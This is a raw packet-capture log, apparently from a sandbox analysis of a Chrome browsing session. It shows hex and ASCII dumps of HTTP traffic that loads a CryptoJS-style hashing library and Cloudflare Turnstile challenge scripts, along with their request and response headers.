                                                                              2024-12-11 14:19:42 UTC1369INData Raw: 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63
                                                                              Data Ascii: .byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:func
                                                                              2024-12-11 14:19:42 UTC1369INData Raw: 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53
                                                                              Data Ascii: At(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRS
                                                                              2024-12-11 14:19:42 UTC1369INData Raw: 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f
                                                                              Data Ascii: in(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._
                                                                              2024-12-11 14:19:42 UTC1369INData Raw: 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30
                                                                              Data Ascii: =C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.1649720104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:43 UTC383OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:44 UTC471INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:43 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47692
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c7f4a8243e7-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:44 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                              Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                              Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                              Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                              Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.1649721104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:43 UTC796OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:44 UTC1362INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 26677
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                              cross-origin-embedder-policy: require-corp
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              origin-agent-cluster: ?1
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              referrer-policy: same-origin
                                                                              document-policy: js-profiling
                                                                              2024-12-11 14:19:44 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 30 36 31 63 37 66 36 61 30 65 34 33 61 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 8f061c7f6a0e43aa-EWRalt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:44 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
